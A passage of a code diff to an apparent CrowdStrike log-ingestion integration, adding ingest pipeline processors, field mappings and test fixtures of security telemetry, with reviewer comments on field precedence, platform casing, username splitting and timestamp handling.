"Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event", + "SensorGroupingTags/USB_Storage_Exception" + ], + "threat": { + "framework": "MITRE ATT&CK", + "tactic": { + "name": [ + "DefenseEvasion" + ] + }, + "technique": { + "name": [ + "Rundll32" + ] + } + }, + "user": { + "name": "vishnu.sharma" + } + }, + { + "@timestamp": "2023-11-03T00:36:37.000Z", + "crowdstrike": { + "event": { + "FineScore": 6.1, + "IncidentType": "1", + "State": "open" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "IncidentSummaryEvent", + "offset": 8698239, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": [ + 
"incident" + ], + "category": [ + "malware" + ], + "created": "2023-11-03T00:36:37.000Z", + "end": "2023-11-03T00:36:37.000Z", + "id": "inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e", + "kind": "alert", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8698239,\"eventType\":\"IncidentSummaryEvent\",\"eventCreationTime\":1698971797000,\"version\":\"1.0\"},\"event\":{\"IncidentStartTime\":1698971797,\"IncidentEndTime\":1698971797,\"FalconHostLink\":\"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e?_cid=ggggffffhhhhjjjjj\",\"State\":\"open\",\"FineScore\":6.1,\"LateralMovement\":0,\"IncidentType\":1,\"IncidentID\":\"inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e\",\"HostID\":\"4345454534534545\"}}", + "reference": "https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e?_cid=ggggffffhhhhjjjjj", + "start": "2023-11-03T00:36:37.000Z", + "type": [ + "info" + ] + }, + "host": { + "id": "4345454534534545" + }, + "message": "Incident score 6.1", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-mobile-detection-summary.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-mobile-detection-summary.log-expected.json index 93403c9f671..93325c49bd3 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-mobile-detection-summary.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-mobile-detection-summary.log-expected.json 
@@ -37,7 +37,7 @@ "malware" ], "created": "2022-04-04T08:30:56.000Z", - "id": 1310556238, + "id": "1310556238", "kind": "alert", "original": "{\n\t\"metadata\": {\n\t\t\"customerIDString\": \"0123456789ABCDEFGHIJKLMNOPQRSTUV\",\n\t\t\"offset\": 701283,\n\t\t\"eventType\": \"MobileDetectionSummaryEvent\",\n\t\t\"eventCreationTime\": 1649420269000,\n\t\t\"version\": \"1.0\"\n\t},\n\t\"event\": {\n\t\t\"SensorId\": \"85ae98xxxxxxd9a8f2\",\n\t\t\"MobileDetectionId\": 1310556238,\n\t\t\"ComputerName\": \"TESTComputer\",\n\t\t\"UserName\": \"TestUSER\",\n\t\t\"ContextTimeStamp\": 1649061056,\n\t\t\"DetectId\": \"0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|1310556238\",\n\t\t\"DetectName\": \"AppSideloadDetected\",\n\t\t\"DetectDescription\": \"Apps are installed from outside the PlayStore. Trigger based on a System callback when apps are installed or updated. \",\n\t\t\"Tactic\": \"Insecure security posture\",\n\t\t\"TacticId\": \"CSTA0009\",\n\t\t\"Technique\": \"Bad device settings\",\n\t\t\"TechniqueId\": \"CST0024\",\n\t\t\"Objective\": \"Falcon Detection Method\",\n\t\t\"Severity\": 50,\n\t\t\"FalconHostLink\": \"https://falcon.crowdstrike.com/mobile/detections/0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|1310556238?_cid=0123456789ABCDEFGHIJKLMNOPQRSTUV\",\n\t\t\"MobileAppsDetails\": [{\n\t\t\t\"AppIdentifier\": \"com.facebook.katana\",\n\t\t\t\"AndroidAppLabel\": \"Facebook\",\n\t\t\t\"DexFileHashes\": \"abc456xxxxxxxxxxxxxxxxdef789\",\n\t\t\t\"ImageFileName\": \"/data/app/com.facebook.katana-djFExxxxxxxxxrkg==/base.apk\",\n\t\t\t\"AppInstallerInformation\": \"unknown\",\n\t\t\t\"IsBeingDebugged\": false,\n\t\t\t\"AndroidAppVersionName\": \"323.0.0.46.119\",\n\t\t\t\"IsContainerized\": false\n\t\t}]\n\t}\n}", "reference": "https://falcon.crowdstrike.com/mobile/detections/0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|1310556238?_cid=0123456789ABCDEFGHIJKLMNOPQRSTUV", 
diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/cspm_events.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/cspm_events.yml index 2f44dcbda99..51234440dc7 100644 --- a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/cspm_events.yml +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/cspm_events.yml @@ -42,33 +42,39 @@ processors: tag: rename_event_source - rename: field: crowdstrike.event.Severity - target_field: event.severity + target_field: event.severity ignore_missing: true tag: rename_severity - rename: field: crowdstrike.event.AccountId target_field: cloud.account.id ignore_missing: true + if: ctx.cloud?.account?.id == null + tag: rename_cloud_account_id - rename: field: crowdstrike.event.Region target_field: cloud.region ignore_missing: true + if: ctx.cloud?.region == null tag: rename_cloud_region #CSPMS uses Platform, CSPMIOA uses Provider - rename: field: crowdstrike.event.CloudProvider target_field: cloud.provider ignore_missing: true + if: ctx.cloud?.provider == null tag: rename_cloud_provider - rename: field: crowdstrike.event.CloudPlatform target_field: cloud.provider ignore_missing: true + if: ctx.cloud?.provider == null tag: rename_cloud_platform - rename: field: crowdstrike.event.CloudService target_field: cloud.service.name ignore_missing: true + if: ctx.cloud?.service?.name == null tag: rename_cloud_service - rename: field: crowdstrike.event.PolicyStatement diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/default.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/default.yml index 4f8d02086aa..9957d1b2728 100644 --- a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/default.yml +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/default.yml 
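Review bot: The new `if: ctx.cloud?.account?.id == null` guards (and the matching ones on region, provider and service) change which value wins, but nothing in the pipeline says why: when a `cloud.*` field is already populated, the CSPM event's own AccountId/Region/CloudProvider/CloudService now stay under `crowdstrike.event.*` and the ECS field keeps whatever was set upstream. If that upstream source is host metadata from the collecting agent (e.g. add_cloud_metadata), analysts scoping CSPM findings by `cloud.account.id` would be filtering on the collector's account rather than the account the finding is about, which is the opposite of what a posture finding needs. State the intended precedence at the first guard, e.g. `# Do not overwrite cloud.* set upstream (e.g. agent add_cloud_metadata); the event's own value then remains in crowdstrike.event.*`, and if the finding's AccountId is meant to take precedence, drop the guard for that rename and move the pre-existing value aside instead.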
@@ -253,6 +253,10 @@ processors: name: '{{ IngestPipeline "remote_response_session_end" }}' tag: pipeline_remote_response_session_end if: ctx.crowdstrike?.metadata?.eventType == "RemoteResponseSessionEndEvent" + - pipeline: + name: '{{ IngestPipeline "scheduled_report_notification_event" }}' + tag: pipeline_scheduled_report_notification_event + if: ctx.crowdstrike?.metadata?.eventType == "ScheduledReportNotificationEvent" - set: field: user.email copy_from: user.name diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/firewall_match.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/firewall_match.yml index 09b9c1e63aa..2d378dddb5d 100644 --- a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/firewall_match.yml +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/firewall_match.yml @@ -14,7 +14,7 @@ processors: - append: field: event.type value: - - start + - start - connection tag: append_start_connection_type - append: @@ -164,7 +164,11 @@ processors: ignore_missing: true tag: convert_remote_port if: ctx.crowdstrike?.event?.RemotePort != null && ctx.network?.direction == "egress" - + - rename: + field: crowdstrike.event.Platform + target_field: host.os.platform + ignore_missing: true + tag: rename_Platform on_failure: - append: field: error.message diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/identity_protection_incident.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/identity_protection_incident.yml index ef3cfb5022a..9228595f4b5 100644 --- a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/identity_protection_incident.yml +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/identity_protection_incident.yml 
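Review bot: `host.os.platform` is an ECS lowercase keyword (`windows`, `linux`, `darwin`), and the rename added at the end of the firewall_match hunk copies `crowdstrike.event.Platform` across verbatim; if Falcon reports the firewall event platform as `Windows` or `Mac`, rules and dashboards keyed on the ECS values will miss these events. If the raw values are not already lowercase, follow the rename with `- lowercase: field: host.os.platform ignore_missing: true tag: lowercase_platform`. I cannot see sample firewall events in this diff, so confirm against the data before normalizing.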
@@ -34,7 +34,7 @@ processors: tag: rename_identity_protection_incident_id - rename: field: crowdstrike.event.FalconHostLink - target_field: event.reference + target_field: event.reference ignore_missing: true tag: rename_falcon_host_link - rename: @@ -42,6 +42,11 @@ processors: target_field: user.name ignore_missing: true tag: rename_user_name + - dissect: + if: ctx.user?.name != null && ctx.user.name.contains('\\') + tag: dissect_user_name + field: user.name + pattern: '%{user.domain}\%{user.name}' - rename: field: crowdstrike.event.EndpointName target_field: host.hostname diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/mobile_detection_summary.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/mobile_detection_summary.yml index 95000aee4fa..3c6c26b647b 100644 --- a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/mobile_detection_summary.yml +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/mobile_detection_summary.yml @@ -41,6 +41,11 @@ processors: target_field: event.id ignore_missing: true tag: rename_mobile_detect_id + - convert: + field: event.id + type: string + ignore_missing: true + tag: convert_event_id_to_string - rename: field: crowdstrike.event.DetectId target_field: rule.id @@ -56,7 +61,7 @@ processors: target_field: rule.description ignore_missing: true tag: rename_detect_description - - set: + - set: field: threat.framework value: MITRE ATT&CK - append: @@ -81,7 +86,7 @@ processors: if: ctx.crowdstrike?.event?.TacticId != null - rename: field: crowdstrike.event.ComputerName - target_field: host.name + target_field: host.name ignore_missing: true tag: rename_computer_name - rename: 
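Review bot: The new dissect in identity_protection_incident.yml splits `user.name` on the first backslash and fires whenever one is present, so a Windows local-account shorthand such as `.\user` yields `user.domain: "."`, while a UPN-form name (`user@domain`) passes through untouched even though the scheduled-report pipeline added in this same change splits that form; if the identity-protection feed can emit either shape, handle both here so `user.name` stays comparable across CrowdStrike data streams. A one-line comment would help the next reader: `# Split DOMAIN\user into user.domain and user.name; names without a backslash are left as-is.` Note that `user.name` is overwritten with the bare account, so any `related.user` entry appended earlier from the full value (not visible in this hunk) would no longer match it.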
@@ -91,12 +96,12 @@ processors: tag: rename_user_name - rename: field: crowdstrike.event.FalconHostLink - target_field: event.reference + target_field: event.reference ignore_missing: true tag: rename_falcon_host_link - rename: field: crowdstrike.event.Severity - target_field: event.severity + target_field: event.severity ignore_missing: true tag: rename_severity - rename: diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/scheduled_report_notification_event.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/scheduled_report_notification_event.yml new file mode 100644 index 00000000000..1dcf0ceccc6 --- /dev/null +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/scheduled_report_notification_event.yml 
@@ -0,0 +1,60 @@ +--- +description: Pipeline for processing Scheduled Report Notification Event. +processors: + - set: + field: event.kind + value: event + - date: + field: crowdstrike.event.ExecutionMetadata.ExecutionStart + timezone: UTC + formats: + - UNIX_MS + tag: date_utc_timestamp + if: 'ctx.crowdstrike?.event?.ExecutionMetadata?.ExecutionStart != null && String.valueOf(ctx.crowdstrike.event.ExecutionMetadata.ExecutionStart).length() >= 12' + - date: + field: crowdstrike.event.ExecutionMetadata.SearchWindowStart + timezone: UTC + formats: + - UNIX_MS + tag: date_utc_timestamp + if: 'ctx.crowdstrike?.event?.ExecutionMetadata?.SearchWindowStart != null && String.valueOf(ctx.crowdstrike.event.ExecutionMetadata.SearchWindowStart).length() >= 12' + - date: + field: crowdstrike.event.ExecutionMetadata.SearchWindowEnd + timezone: UTC + formats: + - UNIX_MS + tag: date_utc_timestamp + if: 'ctx.crowdstrike?.event?.ExecutionMetadata?.SearchWindowEnd != null && String.valueOf(ctx.crowdstrike.event.ExecutionMetadata.SearchWindowEnd).length() >= 12' + - convert: + field: crowdstrike.event.ExecutionMetadata.ExecutionDuration + type: long + tag: convert_ExecutionDuration + ignore_missing: true + - convert: + field: crowdstrike.event.ExecutionMetadata.ResultCount + type: long + tag: convert_ResultCount + ignore_missing: true + - rename: + field: crowdstrike.event.UserID + target_field: user.id + ignore_missing: true + tag: rename_userID + - dissect: + if: ctx.user?.id != null && ctx.user.id.contains('@') + tag: dissect_user_id + field: user.id + pattern: '%{user.name}@%{user.domain}' + - convert: + field: crowdstrike.event.Status + type: string + tag: convert_Status + ignore_missing: true +on_failure: + - append: + field: error.message + value: |- + Processor "{{ _ingest.on_failure_processor_type }}" with tag "{{ _ingest.on_failure_processor_tag }}" in pipeline "{{ _ingest.on_failure_pipeline }}" failed with message "{{ _ingest.on_failure_message }}" + - set: + field: 
event.kind + value: pipeline_error diff --git a/packages/crowdstrike/data_stream/falcon/fields/fields.yml b/packages/crowdstrike/data_stream/falcon/fields/fields.yml index d8b555cef0c..1caaec6c98e 100644 --- a/packages/crowdstrike/data_stream/falcon/fields/fields.yml +++ b/packages/crowdstrike/data_stream/falcon/fields/fields.yml @@ -22,6 +22,16 @@ title: Event fields type: group fields: + - name: AccountId + type: keyword + - name: AgentIdString + type: keyword + - name: CloudPlatform + type: keyword + - name: CloudProvider + type: keyword + - name: CloudService + type: keyword - name: IncidentType type: keyword description: | @@ -38,6 +48,39 @@ type: keyword description: | Data domains of the event that was the primary indicator or created it. + - name: ExecutionID + type: keyword + - name: ExecutionMetadata + type: group + fields: + - name: ExecutionDuration + type: long + - name: ExecutionStart + type: date + - name: ReportFileName + type: keyword + - name: ResultCount + type: long + - name: ResultID + type: keyword + - name: SearchWindowEnd + type: date + - name: SearchWindowStart + type: date + - name: Region + type: keyword + - name: ReportFileReference + type: keyword + - name: ReportID + type: keyword + - name: ReportName + type: keyword + - name: ReportType + type: keyword + - name: StatusMessage + type: keyword + - name: UserUUID + type: keyword - name: ActivityId type: keyword description: | diff --git a/packages/crowdstrike/data_stream/falcon/manifest.yml b/packages/crowdstrike/data_stream/falcon/manifest.yml index 29fc804f026..6f1a96ca600 100644 --- a/packages/crowdstrike/data_stream/falcon/manifest.yml +++ b/packages/crowdstrike/data_stream/falcon/manifest.yml @@ -2,6 +2,7 @@ type: logs title: Crowdstrike falcon logs streams: - input: logfile + enabled: false vars: - name: paths type: text 
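Review bot: The three `date` processors in the new scheduled_report_notification_event.yml set no `target_field`, and the Elasticsearch date processor writes to `@timestamp` by default, so each one overwrites the event timestamp and the last to run (SearchWindowEnd) wins — while `ExecutionStart`, `SearchWindowStart` and `SearchWindowEnd` themselves are left as raw epoch-millisecond numbers even though the fields.yml hunk in this change maps them as `date`. They also all carry the tag `date_utc_timestamp`, so the pipeline's `on_failure` message cannot say which conversion failed. If the intent is in-place conversion, set `target_field` to the source field and give each processor its own tag, as below; if one of them is meant to feed `@timestamp`, keep only that one writing there. I am assuming the default pipeline has already set `@timestamp` from `metadata.eventCreationTime` before dispatching here (not visible in this diff).
```yaml
  - date:
      field: crowdstrike.event.ExecutionMetadata.ExecutionStart
      target_field: crowdstrike.event.ExecutionMetadata.ExecutionStart
      timezone: UTC
      formats:
        - UNIX_MS
      tag: date_execution_start
      if: 'ctx.crowdstrike?.event?.ExecutionMetadata?.ExecutionStart != null && String.valueOf(ctx.crowdstrike.event.ExecutionMetadata.ExecutionStart).length() >= 12'
  - date:
      field: crowdstrike.event.ExecutionMetadata.SearchWindowStart
      target_field: crowdstrike.event.ExecutionMetadata.SearchWindowStart
      timezone: UTC
      formats:
        - UNIX_MS
      tag: date_search_window_start
      if: 'ctx.crowdstrike?.event?.ExecutionMetadata?.SearchWindowStart != null && String.valueOf(ctx.crowdstrike.event.ExecutionMetadata.SearchWindowStart).length() >= 12'
  - date:
      field: crowdstrike.event.ExecutionMetadata.SearchWindowEnd
      target_field: crowdstrike.event.ExecutionMetadata.SearchWindowEnd
      timezone: UTC
      formats:
        - UNIX_MS
      tag: date_search_window_end
      if: 'ctx.crowdstrike?.event?.ExecutionMetadata?.SearchWindowEnd != null && String.valueOf(ctx.crowdstrike.event.ExecutionMetadata.SearchWindowEnd).length() >= 12'
  # … unchanged: convert/rename/dissect processors and on_failure …
```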
diff --git a/packages/crowdstrike/data_stream/falcon/sample_event.json b/packages/crowdstrike/data_stream/falcon/sample_event.json index b9ef09dbc28..ffc1cb8d9c0 100644 --- a/packages/crowdstrike/data_stream/falcon/sample_event.json +++ b/packages/crowdstrike/data_stream/falcon/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2020-02-12T21:29:10.000Z", "agent": { - "ephemeral_id": "6b7924ba-f695-422a-a296-d1092ff909e4", - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "ephemeral_id": "fe495f50-2dbf-43ee-9c49-b35ef8bf9235", + "id": "df7cb44a-7978-449c-992e-c6b22e788ae9", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.11.0" }, "crowdstrike": { "event": { @@ -50,9 +50,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "id": "df7cb44a-7978-449c-992e-c6b22e788ae9", "snapshot": false, - "version": "8.10.1" + "version": "8.11.0" }, "event": { "action": [ 
@@ -64,7 +64,7 @@ ], "created": "2020-02-12T21:29:10.710Z", "dataset": "crowdstrike.falcon", - "ingested": "2023-09-26T13:19:10Z", + "ingested": "2024-01-29T08:59:16Z", "kind": "event", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 0,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581542950710,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"api-client-id:1234567890abcdefghijklmnopqrstuvwxyz\",\n \"UserIp\": \"10.10.0.8\",\n \"OperationName\": \"streamStarted\",\n \"ServiceName\": \"Crowdstrike Streaming API\",\n \"Success\": true,\n \"UTCTimestamp\": 1581542950,\n \"AuditKeyValues\": [\n {\n \"Key\": \"APIClientID\",\n \"ValueString\": \"1234567890abcdefghijklmnopqr\"\n },\n {\n \"Key\": \"partition\",\n \"ValueString\": \"0\"\n },\n {\n \"Key\": \"offset\",\n \"ValueString\": \"-1\"\n },\n {\n \"Key\": \"appId\",\n \"ValueString\": \"siem-connector-v2.0.0\"\n },\n {\n \"Key\": \"eventType\",\n \"ValueString\": \"[UserActivityAuditEvent HashSpreadingEvent RemoteResponseSessionStartEvent RemoteResponseSessionEndEvent DetectionSummaryEvent AuthActivityAuditEvent]\"\n }\n ]\n }\n}", "outcome": "success" diff --git a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log index d906f160ab4..27e0440f31a 100644 --- a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log +++ b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log 
@@ -127,4 +127,5 @@ {"ProcessCreateFlags":"1024","IntegrityLevel":"8192","ParentProcessId":"434985540832797032","SourceProcessId":"434985540832797032","aip":"89.160.20.120","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-4084637156-299436391-3671333128-115430","event_platform":"Win","TokenType":"2","ProcessEndTime":"","ParentBaseFileName":"EmUser.exe","ImageSubsystem":"2","id":"9686a6b3-1d39-11ed-9370-0660bfa16adf","EffectiveTransmissionClass":"3","SessionId":"1","Tags":"25, 27, 862, 874, 924, 12094627905582, 12094627906234","timestamp":"1660636869410","event_simpleName":"ProcessRollup2","RawProcessId":"6108","ConfigStateHash":"518095218","MD5HashData":"e570911fc2ab74ecf0dc59f324318f6e","SHA256HashData":"f470180a4f67ebd944570b3eaf040caa8c0713252c6228e60c413714375ccfe2","ProcessSxsFlags":"64","AuthenticationId":"29530993","ConfigBuild":"1007.3.0015103.1","CommandLine":"\"C:\\Program Files\\nirsoft\\SoundVolumeView.exe\" /SetDefault \"Teradici Virtual Audio Driver\\device\\speakers\\\" all","ParentAuthenticationId":"29530993","TargetProcessId":"434985669758362104","ImageFileName":"\\Device\\HarddiskVolume3\\Program Files\\NirSoft\\SoundVolumeView.exe","SourceThreadId":"434985668331321297","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1660636868.576","ProcessParameterFlags":"24577","aid":"50deaa55144543089a1f463b568cdc53","cid":"1301ac65ae144fbb9689a8472f828c2e"} 
{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":133145666190000000,"EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812","StartTime":133145665200000000,"EndTime":133145665200000000} {"ComputerName":"HQ-sadhkbasHS","CurrentLocalIP":"67.43.156.13","FirstDiscoveredDate":"1669625277.827","LastDiscoveredBy":"c1b74438660b44cfa93e24c9d44badab","LocalAddressIP4":"67.43.156.13","MAC":"AA-AA-AA-AA-AA-AA","MACPrefix":"AA-AA-AA","NeighborName":"!!!!UNKNOWN!!!!","__mv_LocalAddressIP4":"","__mv_aip":"$67.43.156.14$;$67.43.156.13$","__mv_discoverer_aid":"$4b8f58d3f5f040b3804d3820ca2aed67$;$c1b74438660b44cfa93e24c9d44badab$","__mv_discoverer_devicetype":"","_time":"1678931820.343","aip":"67.43.156.13 67.43.156.14 81.2.69.192","aipCount":"3","cid":"500c5073b4d7443688f4b32c5eeb295b","discovererCount":"2","discoverer_aid":"4b8f58d3f5f040b3804d3820ca2aed67 c1b74438660b44cfa93e24c9d44badab","discoverer_devicetype":"","localipCount":"1","subnet":"10.0"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812","StartTime":133145665200000000,"EndTime":133145665200000000} \ No newline at end of file 
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812","StartTime":133145665200000000,"EndTime":133145665200000000} +{"AuthenticationId":"703298","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2642284486","ContextProcessId":"1161025471861","ContextThreadId":"34929528116709","ContextTimeStamp":"1604851030.593","DiskParentDeviceInstanceId":"USB\\VID_1058\u0026PID_2621\\57583431453939315A4C5255","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"262fbc677256cf4c8d6c6a227285a072c06830873b000000","FileObject":"18446664963104449168","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"1","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"517029","TargetFileName":"c:\\Device\\HarddiskVolume5\\01.png.tmp$$","TokenType":"1","UserName":"user9","aid":"ffffffff16bf4c7bb5ad755a4722025c","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"GenericFileWritten","id":"ffffffff-1111-11eb-800a-06cecfd73923","name":"GenericFileWrittenV11","timestamp":"1604851031298"} diff --git a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json index e78bd4c2337..8c756bf8489 100644 --- a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json +++ b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json 
@@ -11775,6 +11775,98 @@ "url": { "scheme": "http" } + }, + { + "@timestamp": "2020-11-08T15:57:10.593Z", + "crowdstrike": { + "AuthenticationId": "703298", + "ConfigStateHash": "2642284486", + "EffectiveTransmissionClass": "3", + "Entitlements": "15", + "FileEcpBitmask": "0", + "FileObject": "18446664963104449168", + "IrpFlags": "1028", + "IsOnNetwork": "0", + "IsOnRemovableDisk": "1", + "MajorFunction": "18", + "MinorFunction": "0", + "OperationFlags": "0", + "TokenType": "1", + "cid": "ffffffff30a3407dae27d0503611022d", + "name": "GenericFileWrittenV11" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "GenericFileWritten", + "created": "2020-11-08T15:57:11.298Z", + "id": "ffffffff-1111-11eb-800a-06cecfd73923", + "original": "{\"AuthenticationId\":\"703298\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2642284486\",\"ContextProcessId\":\"1161025471861\",\"ContextThreadId\":\"34929528116709\",\"ContextTimeStamp\":\"1604851030.593\",\"DiskParentDeviceInstanceId\":\"USB\\\\VID_1058\\u0026PID_2621\\\\57583431453939315A4C5255\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"262fbc677256cf4c8d6c6a227285a072c06830873b000000\",\"FileObject\":\"18446664963104449168\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"1\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"517029\",\"TargetFileName\":\"c:\\\\Device\\\\HarddiskVolume5\\\\01.png.tmp$$\",\"TokenType\":\"1\",\"UserName\":\"user9\",\"aid\":\"ffffffff16bf4c7bb5ad755a4722025c\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"GenericFileWritten\",\"id\":\"ffffffff-1111-11eb-800a-06cecfd73923\",\"name\":\"GenericFileWrittenV11\",\"timestamp\":\"1604851031298\"}" + }, + "file": { + "device": "USB\\VID_1058&PID_2621\\57583431453939315A4C5255", + "directory": "c:\\Device\\HarddiskVolume5", + "drive_letter": 
"C", + "extension": "tmp$$", + "inode": "262fbc677256cf4c8d6c6a227285a072c06830873b000000", + "name": "01.png.tmp$$", + "path": "c:\\Device\\HarddiskVolume5\\01.png.tmp$$", + "size": 517029, + "type": "file" + }, + "host": { + "os": { + "type": "windows" + } + }, + "observer": { + "address": [ + "67.43.156.13" + ], + "geo": { + "continent_name": "Asia", + "country_iso_code": "BT", + "country_name": "Bhutan", + "location": { + "lat": 27.5, + "lon": 90.5 + } + }, + "ip": [ + "67.43.156.13" + ], + "serial_number": "ffffffff16bf4c7bb5ad755a4722025c", + "type": "agent", + "vendor": "crowdstrike", + "version": "1007.3.0011603.1" + }, + "process": { + "entity_id": "1161025471861", + "thread": { + "id": 34929528116709 + } + }, + "related": { + "hash": [ + "2642284486" + ], + "ip": [ + "67.43.156.13" + ], + "user": [ + "user9" + ] + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "scheme": "http" + }, + "user": { + "name": "user9" + } } ] } \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/fdr/agent/stream/aws-s3.yml.hbs b/packages/crowdstrike/data_stream/fdr/agent/stream/aws-s3.yml.hbs index 0d28cf13fe2..32e9ed1d8bd 100644 --- a/packages/crowdstrike/data_stream/fdr/agent/stream/aws-s3.yml.hbs +++ b/packages/crowdstrike/data_stream/fdr/agent/stream/aws-s3.yml.hbs @@ -69,8 +69,10 